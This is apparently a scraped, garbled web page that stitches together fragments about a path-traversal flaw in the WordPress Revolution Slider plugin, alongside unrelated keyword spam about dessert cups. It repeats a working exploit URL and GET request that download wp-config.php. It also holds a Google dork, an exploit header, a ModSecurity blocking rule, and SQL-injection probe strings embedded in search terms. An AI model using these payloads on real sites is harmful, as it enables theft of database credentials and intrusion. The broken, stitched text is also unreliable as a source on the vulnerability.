http://victim.com/wp-admin/admin-ajax.?action=revslider_show_image&img=..p-config.php. This is used to... This is incorrect, the issue is specific to WP ( and a very old version of the plugin) — the revslider_show_image function you are referring to is a PHP function. Alex Rosenkranz. I looked on. WORDPRESS-Revslider-Exploit-0DAY - Exploit Wordpress Plugin Revolution Slider - Unrestricted File Upload. The exploit itself is quite easy to test for: simply use your browser to navigate to admin-ajax.php with the appropriate parameters, and if the site is running a vulnerable copy of the plugin your browser will automatically. 1. 2. 3. /wp-admin /admin-ajax.?action=revslider_show_image&img=../wp-config.php. 1. GET /wp-admin/admin-ajax.?action=revslider_show_image&img=../wp- config.php. None of these exploits was successful,. 1. 2. SecRule ARGS "(\.\.\/)+ wp-config.php"\. "phase:1,log,deny,status:503,msg:'Attempt to download wp- config.php via the GET line'". Which seems to shut this one exploit. This wptavern article explains this serious security vulnerability in more detail, but the actual exploit is very easy, just open http://yourdomainhere.com/wp-admin/ admin-ajax.?action=revslider_show_image&img=../wp-config.php using your domain, and the wp-config.php source code will be downloaded. Exploit Title : WordPress Revslider Arbitrary File Upload, Download & Cross Site Scripting # Google Dork : inurl:"/wp-content/plugins/revslider/" # Date : 21-06- 2015 # Exploit Author : CaFc Versace # Vendor Homepage : http://revolution. themepunch.com/ # Tested on : Windows 7 # Contact. ... visa free'A=0'A=0/wp-admin/admin-ajax.?action=revslider_show_image" and "x"="x · visa free'A=0'A=0/wp-admin/admin-ajax.?action= revslider_show_image" and "x"="y · visa free'A=0'A=0/wp-admin/admin-ajax. ?action=revslider_show_image" or (1,2)=(select*from(select name_const(CHAR( 111,108,111,. 1 · bowl · bowls · cake · cake knife · coffee · cup · cups · design · design courses · dessert · dessert cp · dessert cup · dessert cup'A=0 · dessert cups · dessert cups/ · dessert cups/thumb_editor.php · dessert cups/wp-admin/admin-ajax.?action= revolution-slider_show_image · dessert. ... content/wp-admin/admin-ajax.?action=revslider_show_image/wp-admin/ admin-ajax.php" and "x"="y · large content/wp-admin/admin-ajax.?action= revslider_show_image/wp-admin/admin-ajax.php" and "x"="y'A=0 · large content/ wp-admin/admin-ajax.?action=revslider_show_image/wp-admin/admin-ajax. php'.

Related Topics

Recently Viewed